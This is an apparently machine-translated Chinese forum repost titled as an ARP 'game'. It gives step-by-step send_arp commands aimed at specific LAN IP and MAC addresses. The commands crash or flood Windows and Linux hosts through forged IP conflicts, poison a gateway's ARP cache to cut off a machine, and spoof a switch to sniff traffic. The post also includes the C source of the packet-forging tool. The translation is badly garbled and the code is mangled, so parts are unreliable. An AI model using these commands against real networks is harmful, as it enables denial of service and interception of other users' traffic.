ARP game, very fun, I used to use the brother WIN version in the Internet cafe, harm ~~ huh

xiaoxiao2021-03-06  92

I wrote this article just want you to understand the benefits of a certain agreement. Master is free. If someone uses this article everything to do, the cover is not responsible. Online information about ARP has been much, you don't have to say it. In the words of a master, "There are a lot of things we can do, the only thing that is limited is our creativity and imagination." The same is true of ARP. The machine is discussed below has a machine to attack: 10.5.4.178 Hardware Address: 52: 54: 4C: 98: EE: 2F My Motion:: 10.5.69 Hardware Address: 52: 54: 4C: 98: ED: C5 Gateway: 10.5.0.3 Hardware Address: 00: 90: 26: 3D: 0C: F3 One switch to another port of another excipte: 10.5.3 Hardware Address: 52: 54: 4C: 98: ED: F7 1: Break with ARP Windows Screenword Principle: Use the level of IP conflicts than the screen, when there is a conflict, the screen saver will be jumped. Key: The number of ARP packs is appropriate. [root @ SZTCWW Tools] # ./send_arp 10.5.4.178 00: 90: 26: 3D: 0C: F3 / 10.5.4.178 52: 54: 4C: 98: EE: 2F 40 2: Use ARP to cause IP conflicts, crash principle : Windows 9x, NT4 is handled in handling the IP conflict, causing a crash. Note: For Windows 2K, Linux is equivalent to flooding, just more than average flooding. For Linux, the obvious system is slowed down. [root @ sztcww 10.5.4.178 00: 90: 26: 3D: 0C: F3 / 10.5.4.178 52: 54: 4C: 98: EE: 2F 999999999 3: Use ARP to deceive the gateway, can lead to local area networks A certain machine can't stand the gateway. Principle: Use ARP answering packages to refresh the machine that should make it. [root @ sztcww 10.5.4.178 52: 54: 4c: 98: EE: 22 / 10.5.4.178 00: 90: 26: 3D: 0C: F3 1 Note: If you have a single command, it is probably only Can be effective for a few seconds, the ARP cache in the gateway machine will be attacked correctly, so as long as ... 4: Use the ARP to deceive the switch, the machine can also listen to the other end of the switch. You may need to modify Send_arp.c, construct the following packets. Ethhdr Srchw: 52: 54: 4C: 98: ED: F7 ---> DSthw: ff: ff: ff: ff: ff: ff proto: 806h arphdr hwtype: 1 Protol: 800h hw_size: 6 Pro_Size: 4 OP: 1 S_HA: 52: 54: 4C: 98: ED: F7 S_IP: 10.5.3.3 D_HA: 00: 00: 00: 00: 00 D_IP: 10.5.3.3 You can Sniffer. Principle: The switch has a memory MAC address function. It maintains a MAC address and its slogan table, so you can first come to ARP spoof, then you can listen, but you need to point out, deceive, there are two mac addresses. The port number Yuange said, "This is actually a competition problem." After the ARP, it will have a bit impact on the entire network, but I don't dare to determine that it is competition, so the monitor can only listen to some, not like the same hub. monitor. There is an impact on the listener, because he has dropped some data. Of course there are other applications that require other techniques.

The following are send_arp.c the source / * This program sends out one ARP packet with source / target IP and Ethernet hardware addresses suuplied by the user. It compiles and works on Linux and will probably work on any Unix that has SOCK_PACKET. Volobuev @ T1.Chem.Umn.edu * / #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ETH_HW_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define ARP_FRAME_TYPE 0x0806 #define ETHER_HW_TYPE 1 #define IP_PROTO_TYPE 0x0800 #define OP_ARP_REQUEST 2 # define OP_ARP_QUEST 1 #define DEFAULT_DEVICE "eth0" char usage [] = { "send_arp: sends out custom ARP packet yuri volobuev usage:. send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"}; struct arp_packet {u_char targ_hw_addr [ETH_HW_ADDR_LEN]; u_c har src_hw_addr [ETH_HW_ADDR_LEN]; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addr [ETH_HW_ADDR_LEN]; u_char sndr_ip_addr [IP_ADDR_LEN]; u_char rcpt_hw_addr [ETH_HW_ADDR_LEN]; u_char rcpt_ip_addr [IP_ADDR_LEN]; u_char padding [18];}; void Die (char *); void get_ip_addr (struct in_addr *, char *); void get_hw_addr (char *, char *); int main (int Argc, char * argv []) {struct in_addr src_in_addr , TARG_IN_ADDR; STRUCT ARP_PACKET PKT; STRUCT SOCKADDR SA; Int Sock; Int J, Number; IF (Argc! = 6) DIE (USAGE); SOCK =

Socket (AF_INET, SOCK_PACKET, HTONS (ETH_P_RARP)); if (SOCK <0) {Perror ("socket"); exit (1);} Number = ATOI (Argv [5]); pkt.frame_type = htons (arp_frame_type) ; pkt.hw_type = htons (ETHER_HW_TYPE); pkt.prot_type = htons (IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; pkt.prot_addr_size = IP_ADDR_LEN; pkt.op = htons (OP_ARP_QUEST); get_hw_addr (pkt.targ_hw_addr, argv [4] ); get_hw_addr (pkt.rcpt_hw_addr, argv [4]); get_hw_addr (pkt.src_hw_addr, argv [2]); get_hw_addr (pkt.sndr_hw_addr, argv [2]); get_ip_addr (& src_in_addr, argv [1]); get_ip_addr ( & targ_in_addr, argv [3]); memcpy (pkt.sndr_ip_addr, & src_in_addr, IP_ADDR_LEN); memcpy (pkt.rcpt_ip_addr, & targ_in_addr, IP_ADDR_LEN); bzero (pkt.padding, 18); strcpy (sa.sa_data, DEFAULT_DEVICE); for ( J = 0; J s_addr = inet_addr (str); if (in_addr-> s_addr == -1) {IF ((Hostp = gethOstbyName (STR)) BCOPY (Hostp-> h_addr, in_addr, Hostp-> h_length; else {fprintf (stderr, "send_arp: unknown host% s / n", str); exit (1);}}} void get_hw_addr (char * buf, char * str) {INT i; char * C, val; for (i = 0; i = 'a' && c <= 'f') VAL = C-'A ' 10;

转载请注明原文地址:https://www.9cbs.com/read-122245.html

New Post(0)